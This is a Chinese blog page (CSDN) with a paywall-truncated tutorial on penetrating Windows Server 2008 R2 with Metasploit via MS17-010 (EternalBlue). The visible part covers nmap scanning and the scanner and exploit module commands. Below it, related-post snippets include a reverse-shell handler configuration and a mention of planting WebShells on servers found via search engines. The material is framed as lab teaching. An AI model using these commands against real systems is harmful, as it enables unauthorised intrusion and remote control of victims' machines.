MSF渗透Win server 2008 R2

最新推荐文章于 2025-04-14 17:35:39 发布
最新推荐文章于 2025-04-14 17:35:39 发布
阅读量8k 收藏 30
点赞数 5
文章标签: metasploit kali linux hacks windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43307937/article/details/109700383
版权
本文介绍了如何通过Metasploit渗透Windows Server 2008 R2的详细步骤,包括信息收集、漏洞探测、利用MS17_010漏洞进行永恒之蓝攻击、权限提升、权限维持、远程桌面接入以及痕迹清除。通过这个过程,展示了安全学习和教学中合法渗透测试的一系列操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

详细步骤

1.信息收集

使用nmap工具进行扫描,发现发现开放了445端口,尝试利用MS17_010漏洞。

nmap –sV 目标主机IP地址

在这里插入图片描述

2.漏洞探测

2. 1查看漏洞模块

search ms17-010

在这里插入图片描述
2. 2使用Auxiliary模块测试目标
选择Auxiliary模块

use auxiliary/scanner/smb/smb_ms17_010

设置目标主机IP并测试

set RHOST 目标主机IP地址
run

在这里插入图片描述

3.漏洞利用

使用exploit模块进行永恒之蓝攻击

use exploit/windows/smb/ms17_0
最低0.47元/天 解锁文章
MSF远程渗透windows
Cwillchris的博客
05-04 853
刚接触MSF的你本地已经学会了渗透,但是如何远程渗透,怎么做,今天教你,声明仅限教学 1、环境准备 准备好 kali linux (IP为192.168.98.30) Windows(IP为192.168.98.150,可以是任意没有安装杀软的Windows器,有兴趣的可以让不在一个局域网的朋友配合一下) 2、申请免费公网隧道 打开Sunny网 ,注册个账号 按要求注册一个账号,然后登录 然后先仔细看教程,先进行实名认证,需要pay认证费用,且通过支付宝实名认证(防..
2008 r2 server 提权_某次Windows渗透提权过程
weixin_39624071的博客
12-19 1707
0x01物色目标大多数站点出于安全考虑,都会在robots.txt文件中屏蔽掉搜索引擎对敏感路径页面的爬取。robots文件里的敏感路径在针对一个目标渗透时可以帮助我们识别出重要页面,但它的存在不利于自动化工具的批量采集,所以Censys、Shodan、Zoomeye就不会那么灵敏了。 首先在Censys中利用敏感路经找到了一堆服务器,挑了几个看起来顺眼的利用某代码执行漏洞写入WebShell ...
利用MSF渗透windows系统,windows数据库,linux系统实验
Cwillchris的博客
10-18 1763
实验环境: kali:172.16.12.30 windows:172.16.12.4 用户名:administrator 密码:vgrant centos靶:172.16.12.11 用户名:root 密码:123 实验步骤: 一、攻击LINUX服务器 1、扫描目标获取哪些服务和端口开启 ┌──(root????kali)-[~/desktop] └─# msfdb run msf6 > db_nmap -A -v 172.16.12.4 查看目标器服务列表
Metasploit Framework(MSF)实战宝典:从入门到精通的渗透测试全流程与案例解析 MSF简这个黑客利器工具
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
04-14 1043
Metasploit Framework(MSF)是一个开源的渗透测试框架,集成了漏洞利用代码(Exploit)、载荷(Payload)、辅助工具(Auxiliary)和后渗透模块(Post),被广泛应用于安全研究和渗透测试。MSF通过模块化设计,简化了漏洞利用和后渗透操作,帮助测试人员快速验证系统安全性。它是渗透测试领域的核心工具之一,理解其模块和使用流程是学习的关键。准备阶段安装并更新MSF,启动msfconsole。信息收集使用Auxiliary模块扫描目标。漏洞利用。
Kali利用msf渗透Windows电脑(超详细)
Galaxy_0的博客
08-19 2109
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
linux winserver漏洞,Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程
weixin_39781930的博客
05-16 2164
本文将复现MS17010漏洞在windows Server 2012 R2系统下的利用过程,通过使用msf渗透框架生成的shell以及github上的exp生成的二进制文件相拼接,从而生成一个完整的二进制文件,注入到远程主的系统进程中。测试环境kali linux 2017 x32(attacker)Windows Server 2012 R2(victim)准备工作首先下载相关的PoC下载et...
MSFWindows渗透测试
qq_67812668的博客
08-09 1200
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
kali使用msf–永恒之蓝攻击模块windows2008 R2
lkwdoitnow的博客
03-31 1529
准备: kali虚拟window2008 R2 虚拟 请保证kali可以ping通win2008(如果win2008可以pingkalikali不可以pingwin2008 请检查win2008的防火墙是否关闭) 在kali中输入msfconsole进入msf 选择攻击武器auxiliary/scanner/smb/smb_version 输入show options来查看需要设置的信息 选择攻击对象: set rhosts id(目标主win2008) 选择网关
记一次本地Windows-server-2008渗透测试
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-19 2850
文章目录一、概述二、信息收集1、主探测2、系统指纹识别3、服务指纹识别4、常见漏洞探测三、漏洞利用、提权与维权1、MS17-010漏洞利用2、提权与维权3、痕迹清除四、POC验证测试 一、概述 本次渗透测试是在已知Windows server 2008中存在某些漏洞的情况下,进行的验证性测试,目的在于熟悉渗透测试流程,掌握渗透测试工具的基本使用方法。 首先明确我们的渗透测试目标:Windows server 2008(192.168.6.135), 其次明确我们的渗透测试步骤: 信息收集 漏洞嗅探 漏洞
项目二 利用漏洞对windows server 2008r2的域控制器的渗透测试
王先生的蒋小姐的博客
07-18 1589
大家好,我是SuieKa。我语痴语痴哈哈,不知道开场白说些啥,但是 各位大佬们一起加油哟! 树一、为windows server 2008安装DNS及AD域控制器二、前期登录以及尝试访问域控制器三、利用漏洞对域控制器进行渗透,并连入注册表 一、为windows server 2008安装DNS及AD域控制器 二、前期登录以及尝试访问域控制器 三、利用漏洞对域控制器进行渗透,并连入注册表 ...
Windows-server-2008 搭建渗透测试靶
zhq199528的博客
10-03 3143
** Windows-server-2008 搭建靶 ** 首先,为了方便后面的操作,我们要在开前进行文件共享,使我们要用的文件夹共享到虚拟上 开启虚拟(因为我这是之前就已经的做好的一个,然后进行了一下克隆,所以很多步骤在这里就不显示了,如要了解可去我的文章库里进行寻找) 对xampp应用程序进行一些配置更改,让xampp使用管理员身份运行 安装gVim,后面的配置文件都要用vim进行编辑 打开xampp,更改配置 (使用gVim打开xampp的配置文件,并进行编辑) (开启Apa
使用MSF进行提权(windows提权、linux提权、wesng使用
喜欢Python编程的程序员柚柚呀
02-29 1388
安全焦点,其BugTraq是一个出色的漏洞和exploit数据源,可以通过CVE编号,或者产品信息漏洞直接搜索。将刚才生成的 s.exe 文件上传到服务器(靶)C:\RECYCLER\s.exe 目录(因为一般C:\RECYCLER\ 目录都有读写权限)选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。如果攻击者对可能导致远程代码执行的漏洞和/或仅具有可用漏洞利用代码的漏洞感兴趣,这将非常有用。为此,可以分别使用​。
Windows Server 2008 R2 CVE-2012-0002/CVE-2012-0152 漏洞处理
weixin_43360094的博客
08-05 5241
处理windows Server CVE-2012-0002、CVE-2012-0152漏洞
使用msf--永恒之蓝攻击模块windows2008 R2
qq_43348375的博客
08-26 3137
使用msf–永恒之蓝攻击模块windows2008 R2 准备:kaliwindow2008 R2 虚拟 做之前请保证kali可以ping通win2008 kali的IP地址是192.168.29.128 win2008的IP地址是192.168.29.129 首先进入kalimsf msf是集成在kali镜像中的攻击框架,里面继承了许多的漏洞和攻击载荷,下面就让我们一睹它的风采吧。...
kali-Linux局域网渗透Win2008
LJHandCXY的博客
03-28 5144
相关参数 kali的IP地址为:192.168.0.103/24 win2003的IP地址为:192.168.0.138/24 (一)蓝屏攻击(针对2008)   前提:对方开启3389端口且只对某些操作系统有效   原理:利用操作系统内核的缺陷,发送大量数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码 可使用Kali自带的nmap来进行扫描 渗透前提 nmap -sV [IP地址] 或 nmap -sS -sV [IP地址]都可 #大家怎么方便怎么来 情
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透1 — 制作 windowslinux 客户端恶意软件进行渗透
天下著书立传者,皆为我师
05-29 2627
通过制作含病毒和木马的恶意程序,利用msfvenom模块,完成靶msf相应的通信
msf 渗透攻击 win7 主32
12-03
Metasploit Framework (Msf) 是一款广泛使用的开源渗透测试工具,它允许安全专家进行各种类型的攻击,包括Windows系统如Win7主渗透测试。针对32位的Win7主Msf 提供了一系列payloads和exploits,用于利用系统漏洞、远程代码执行等。 首先,你需要获取并安装Metasploit框架,可以在这里下载适合32位系统的版本:https://www.metasploit.com/download 然后,连接到目标32Win7器通常需要使用Meterpreter shell,这是一种轻量级的交互式环境。在Msf成功发起攻击并通过 exploitation模块找到合适漏洞后,会生成Payload(攻击链),比如: ``` use exploit/multi/handler set payload windows/x86/shell_reverse_tcp set lhost <your-lanip> set lport <your-listening-port> exploit ``` 这里`windows/x86/shell_reverse_tcp`是一个示例payload,它会在目标器上创建一个反向连接监听的shell。执行后,Msf会尝试触发payload,并通过指定的IP和端口接收控制连接。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值